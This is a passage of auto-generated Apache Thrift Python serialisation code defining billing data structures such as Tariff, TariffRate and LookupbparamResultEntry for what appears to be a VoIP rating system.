self.crtime_ext = crtime_ext
self.rtime = rtime
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.crtime_acct = MonoTime()
self.crtime_acct.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.crtime_ext = MonoTime()
self.crtime_ext.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.rtime = MonoTime()
self.rtime.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CreditTimes')
if self.crtime_acct is not None:
oprot.writeFieldBegin('crtime_acct', TType.STRUCT, 1)
self.crtime_acct.write(oprot)
oprot.writeFieldEnd()
if self.crtime_ext is not None:
oprot.writeFieldBegin('crtime_ext', TType.STRUCT, 2)
self.crtime_ext.write(oprot)
oprot.writeFieldEnd()
if self.rtime is not None:
oprot.writeFieldBegin('rtime', TType.STRUCT, 3)
self.rtime.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Duration(object):
"""
Attributes:
- nanoseconds
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'nanoseconds', None, None, ), # 1
)
def __init__(self, nanoseconds=None,):
self.nanoseconds = nanoseconds
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.nanoseconds = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Duration')
if self.nanoseconds is not None:
oprot.writeFieldBegin('nanoseconds', TType.I64, 1)
oprot.writeI64(self.nanoseconds)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Tariff(object):
"""
Attributes:
- post_call_surcharge
- connect_fee
- name
- i_tariff
- free_seconds
- i_owner
- iso_4217
- grace_period
- max_loss
- average_duration
- loss_protection
- local_calling
- local_calling_cli_validation_rule
- last_change_count
- local_id
- remote_id
- is_remote
- is_exportable
- decimal_precision
- cost_round_up
"""
thrift_spec = (
None, # 0
(1, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 1
(2, TType.DOUBLE, 'connect_fee', None, None, ), # 2
(3, TType.STRUCT, 'name', (NullString, NullString.thrift_spec), None, ), # 3
(4, TType.I64, 'i_tariff', None, None, ), # 4
(5, TType.I32, 'free_seconds', None, None, ), # 5
(6, TType.I64, 'i_owner', None, None, ), # 6
(7, TType.STRING, 'iso_4217', 'UTF8', None, ), # 7
(8, TType.I32, 'grace_period', None, None, ), # 8
(9, TType.DOUBLE, 'max_loss', None, None, ), # 9
(10, TType.I32, 'average_duration', None, None, ), # 10
(11, TType.BOOL, 'loss_protection', None, None, ), # 11
(12, TType.BOOL, 'local_calling', None, None, ), # 12
(13, TType.STRING, 'local_calling_cli_validation_rule', 'UTF8', None, ), # 13
(14, TType.I64, 'last_change_count', None, None, ), # 14
(15, TType.STRUCT, 'local_id', (NullString, NullString.thrift_spec), None, ), # 15
(16, TType.STRUCT, 'remote_id', (NullString, NullString.thrift_spec), None, ), # 16
(17, TType.BOOL, 'is_remote', None, None, ), # 17
(18, TType.BOOL, 'is_exportable', None, None, ), # 18
(19, TType.I32, 'decimal_precision', None, None, ), # 19
(20, TType.BOOL, 'cost_round_up', None, None, ), # 20
)
def __init__(self, post_call_surcharge=None, connect_fee=None, name=None, i_tariff=None, free_seconds=None, i_owner=None, iso_4217=None, grace_period=None, max_loss=None, average_duration=None, loss_protection=None, local_calling=None, local_calling_cli_validation_rule=None, last_change_count=None, local_id=None, remote_id=None, is_remote=None, is_exportable=None, decimal_precision=None, cost_round_up=None,):
self.post_call_surcharge = post_call_surcharge
self.connect_fee = connect_fee
self.name = name
self.i_tariff = i_tariff
self.free_seconds = free_seconds
self.i_owner = i_owner
self.iso_4217 = iso_4217
self.grace_period = grace_period
self.max_loss = max_loss
self.average_duration = average_duration
self.loss_protection = loss_protection
self.local_calling = local_calling
self.local_calling_cli_validation_rule = local_calling_cli_validation_rule
self.last_change_count = last_change_count
self.local_id = local_id
self.remote_id = remote_id
self.is_remote = is_remote
self.is_exportable = is_exportable
self.decimal_precision = decimal_precision
self.cost_round_up = cost_round_up
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.name = NullString()
self.name.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.i_tariff = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.free_seconds = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I64:
self.i_owner = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.STRING:
self.iso_4217 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.DOUBLE:
self.max_loss = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I32:
self.average_duration = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.BOOL:
self.loss_protection = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.BOOL:
self.local_calling = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.STRING:
self.local_calling_cli_validation_rule = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.I64:
self.last_change_count = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.STRUCT:
self.local_id = NullString()
self.local_id.read(iprot)
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.STRUCT:
self.remote_id = NullString()
self.remote_id.read(iprot)
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.BOOL:
self.is_remote = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.BOOL:
self.is_exportable = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.I32:
self.decimal_precision = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 20:
if ftype == TType.BOOL:
self.cost_round_up = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Tariff')
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 1)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 2)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRUCT, 3)
self.name.write(oprot)
oprot.writeFieldEnd()
if self.i_tariff is not None:
oprot.writeFieldBegin('i_tariff', TType.I64, 4)
oprot.writeI64(self.i_tariff)
oprot.writeFieldEnd()
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I32, 5)
oprot.writeI32(self.free_seconds)
oprot.writeFieldEnd()
if self.i_owner is not None:
oprot.writeFieldBegin('i_owner', TType.I64, 6)
oprot.writeI64(self.i_owner)
oprot.writeFieldEnd()
if self.iso_4217 is not None:
oprot.writeFieldBegin('iso_4217', TType.STRING, 7)
oprot.writeString(self.iso_4217.encode('utf-8') if sys.version_info[0] == 2 else self.iso_4217)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 8)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
if self.max_loss is not None:
oprot.writeFieldBegin('max_loss', TType.DOUBLE, 9)
oprot.writeDouble(self.max_loss)
oprot.writeFieldEnd()
if self.average_duration is not None:
oprot.writeFieldBegin('average_duration', TType.I32, 10)
oprot.writeI32(self.average_duration)
oprot.writeFieldEnd()
if self.loss_protection is not None:
oprot.writeFieldBegin('loss_protection', TType.BOOL, 11)
oprot.writeBool(self.loss_protection)
oprot.writeFieldEnd()
if self.local_calling is not None:
oprot.writeFieldBegin('local_calling', TType.BOOL, 12)
oprot.writeBool(self.local_calling)
oprot.writeFieldEnd()
if self.local_calling_cli_validation_rule is not None:
oprot.writeFieldBegin('local_calling_cli_validation_rule', TType.STRING, 13)
oprot.writeString(self.local_calling_cli_validation_rule.encode('utf-8') if sys.version_info[0] == 2 else self.local_calling_cli_validation_rule)
oprot.writeFieldEnd()
if self.last_change_count is not None:
oprot.writeFieldBegin('last_change_count', TType.I64, 14)
oprot.writeI64(self.last_change_count)
oprot.writeFieldEnd()
if self.local_id is not None:
oprot.writeFieldBegin('local_id', TType.STRUCT, 15)
self.local_id.write(oprot)
oprot.writeFieldEnd()
if self.remote_id is not None:
oprot.writeFieldBegin('remote_id', TType.STRUCT, 16)
self.remote_id.write(oprot)
oprot.writeFieldEnd()
if self.is_remote is not None:
oprot.writeFieldBegin('is_remote', TType.BOOL, 17)
oprot.writeBool(self.is_remote)
oprot.writeFieldEnd()
if self.is_exportable is not None:
oprot.writeFieldBegin('is_exportable', TType.BOOL, 18)
oprot.writeBool(self.is_exportable)
oprot.writeFieldEnd()
if self.decimal_precision is not None:
oprot.writeFieldBegin('decimal_precision', TType.I32, 19)
oprot.writeI32(self.decimal_precision)
oprot.writeFieldEnd()
if self.cost_round_up is not None:
oprot.writeFieldBegin('cost_round_up', TType.BOOL, 20)
oprot.writeBool(self.cost_round_up)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TariffRate(object):
"""
Attributes:
- i_rate
- prefix
- i_tariff
- price_1
- price_n
- interval_1
- interval_n
- forbidden
- grace_period_enable
- local_price_1
- local_price_n
- local_interval_1
- local_interval_n
- area_name
- activation_date
- expiration_date
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_rate', None, None, ), # 1
(2, TType.STRING, 'prefix', 'UTF8', None, ), # 2
(3, TType.I64, 'i_tariff', None, None, ), # 3
(4, TType.DOUBLE, 'price_1', None, None, ), # 4
(5, TType.DOUBLE, 'price_n', None, None, ), # 5
(6, TType.I32, 'interval_1', None, None, ), # 6
(7, TType.I32, 'interval_n', None, None, ), # 7
(8, TType.BOOL, 'forbidden', None, None, ), # 8
(9, TType.BOOL, 'grace_period_enable', None, None, ), # 9
(10, TType.DOUBLE, 'local_price_1', None, None, ), # 10
(11, TType.DOUBLE, 'local_price_n', None, None, ), # 11
(12, TType.I32, 'local_interval_1', None, None, ), # 12
(13, TType.I32, 'local_interval_n', None, None, ), # 13
(14, TType.STRUCT, 'area_name', (NullString, NullString.thrift_spec), None, ), # 14
(15, TType.STRUCT, 'activation_date', (UnixTime, UnixTime.thrift_spec), None, ), # 15
(16, TType.STRUCT, 'expiration_date', (UnixTime, UnixTime.thrift_spec), None, ), # 16
)
def __init__(self, i_rate=None, prefix=None, i_tariff=None, price_1=None, price_n=None, interval_1=None, interval_n=None, forbidden=None, grace_period_enable=None, local_price_1=None, local_price_n=None, local_interval_1=None, local_interval_n=None, area_name=None, activation_date=None, expiration_date=None,):
self.i_rate = i_rate
self.prefix = prefix
self.i_tariff = i_tariff
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.forbidden = forbidden
self.grace_period_enable = grace_period_enable
self.local_price_1 = local_price_1
self.local_price_n = local_price_n
self.local_interval_1 = local_interval_1
self.local_interval_n = local_interval_n
self.area_name = area_name
self.activation_date = activation_date
self.expiration_date = expiration_date
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_rate = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.prefix = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_tariff = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.BOOL:
self.forbidden = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.BOOL:
self.grace_period_enable = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.DOUBLE:
self.local_price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.DOUBLE:
self.local_price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.I32:
self.local_interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.I32:
self.local_interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.STRUCT:
self.area_name = NullString()
self.area_name.read(iprot)
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.STRUCT:
self.activation_date = UnixTime()
self.activation_date.read(iprot)
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.STRUCT:
self.expiration_date = UnixTime()
self.expiration_date.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TariffRate')
if self.i_rate is not None:
oprot.writeFieldBegin('i_rate', TType.I64, 1)
oprot.writeI64(self.i_rate)
oprot.writeFieldEnd()
if self.prefix is not None:
oprot.writeFieldBegin('prefix', TType.STRING, 2)
oprot.writeString(self.prefix.encode('utf-8') if sys.version_info[0] == 2 else self.prefix)
oprot.writeFieldEnd()
if self.i_tariff is not None:
oprot.writeFieldBegin('i_tariff', TType.I64, 3)
oprot.writeI64(self.i_tariff)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 4)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 5)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 6)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 7)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.forbidden is not None:
oprot.writeFieldBegin('forbidden', TType.BOOL, 8)
oprot.writeBool(self.forbidden)
oprot.writeFieldEnd()
if self.grace_period_enable is not None:
oprot.writeFieldBegin('grace_period_enable', TType.BOOL, 9)
oprot.writeBool(self.grace_period_enable)
oprot.writeFieldEnd()
if self.local_price_1 is not None:
oprot.writeFieldBegin('local_price_1', TType.DOUBLE, 10)
oprot.writeDouble(self.local_price_1)
oprot.writeFieldEnd()
if self.local_price_n is not None:
oprot.writeFieldBegin('local_price_n', TType.DOUBLE, 11)
oprot.writeDouble(self.local_price_n)
oprot.writeFieldEnd()
if self.local_interval_1 is not None:
oprot.writeFieldBegin('local_interval_1', TType.I32, 12)
oprot.writeI32(self.local_interval_1)
oprot.writeFieldEnd()
if self.local_interval_n is not None:
oprot.writeFieldBegin('local_interval_n', TType.I32, 13)
oprot.writeI32(self.local_interval_n)
oprot.writeFieldEnd()
if self.area_name is not None:
oprot.writeFieldBegin('area_name', TType.STRUCT, 14)
self.area_name.write(oprot)
oprot.writeFieldEnd()
if self.activation_date is not None:
oprot.writeFieldBegin('activation_date', TType.STRUCT, 15)
self.activation_date.write(oprot)
oprot.writeFieldEnd()
if self.expiration_date is not None:
oprot.writeFieldBegin('expiration_date', TType.STRUCT, 16)
self.expiration_date.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TariffRateList(object):
"""
Attributes:
- arr
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'arr', (TType.STRUCT, (TariffRate, TariffRate.thrift_spec), False), None, ), # 1
)
def __init__(self, arr=None,):
self.arr = arr
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.arr = []
(_etype10, _size7) = iprot.readListBegin()
for _i11 in range(_size7):
_elem12 = TariffRate()
_elem12.read(iprot)
self.arr.append(_elem12)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TariffRateList')
if self.arr is not None:
oprot.writeFieldBegin('arr', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.arr))
for iter13 in self.arr:
iter13.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class LocalTariffRate(object):
"""
Attributes:
- activation_date
- expiration_date
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'activation_date', (UnixTime, UnixTime.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'expiration_date', (UnixTime, UnixTime.thrift_spec), None, ), # 2
)
def __init__(self, activation_date=None, expiration_date=None,):
self.activation_date = activation_date
self.expiration_date = expiration_date
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.activation_date = UnixTime()
self.activation_date.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.expiration_date = UnixTime()
self.expiration_date.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('LocalTariffRate')
if self.activation_date is not None:
oprot.writeFieldBegin('activation_date', TType.STRUCT, 1)
self.activation_date.write(oprot)
oprot.writeFieldEnd()
if self.expiration_date is not None:
oprot.writeFieldBegin('expiration_date', TType.STRUCT, 2)
self.expiration_date.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class LocalTariffRateList(object):
"""
Attributes:
- arr
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'arr', (TType.STRUCT, (LocalTariffRate, LocalTariffRate.thrift_spec), False), None, ), # 1
)
def __init__(self, arr=None,):
self.arr = arr
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.arr = []
(_etype17, _size14) = iprot.readListBegin()
for _i18 in range(_size14):
_elem19 = LocalTariffRate()
_elem19.read(iprot)
self.arr.append(_elem19)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('LocalTariffRateList')
if self.arr is not None:
oprot.writeFieldBegin('arr', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.arr))
for iter20 in self.arr:
iter20.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class LookupbparamResultEntry(object):
"""
Attributes:
- free_seconds
- connect_fee
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- grace_period
- forbidden
- average_duration
- loss_protection
- max_loss
- prefix
- plan_only
- area_name
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'free_seconds', None, None, ), # 1
(2, TType.DOUBLE, 'connect_fee', None, None, ), # 2
(3, TType.DOUBLE, 'price_1', None, None, ), # 3
(4, TType.DOUBLE, 'price_n', None, None, ), # 4
(5, TType.I32, 'interval_1', None, None, ), # 5
(6, TType.I32, 'interval_n', None, None, ), # 6
(7, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 7
(8, TType.I32, 'grace_period', None, None, ), # 8
(9, TType.BOOL, 'forbidden', None, None, ), # 9
(10, TType.I32, 'average_duration', None, None, ), # 10
(11, TType.BOOL, 'loss_protection', None, None, ), # 11
(12, TType.DOUBLE, 'max_loss', None, None, ), # 12
(13, TType.STRING, 'prefix', 'UTF8', None, ), # 13
(14, TType.BOOL, 'plan_only', None, None, ), # 14
(15, TType.STRUCT, 'area_name', (NullString, NullString.thrift_spec), None, ), # 15
)
def __init__(self, free_seconds=None, connect_fee=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, grace_period=None, forbidden=None, average_duration=None, loss_protection=None, max_loss=None, prefix=None, plan_only=None, area_name=None,):
self.free_seconds = free_seconds
self.connect_fee = connect_fee
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.grace_period = grace_period
self.forbidden = forbidden
self.average_duration = average_duration
self.loss_protection = loss_protection
self.max_loss = max_loss
self.prefix = prefix
self.plan_only = plan_only
self.area_name = area_name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.free_seconds = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.BOOL:
self.forbidden = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I32:
self.average_duration = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.BOOL:
self.loss_protection = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.DOUBLE:
self.max_loss = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.STRING:
self.prefix = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.BOOL:
self.plan_only = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.STRUCT:
self.area_name = NullString()
self.area_name.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
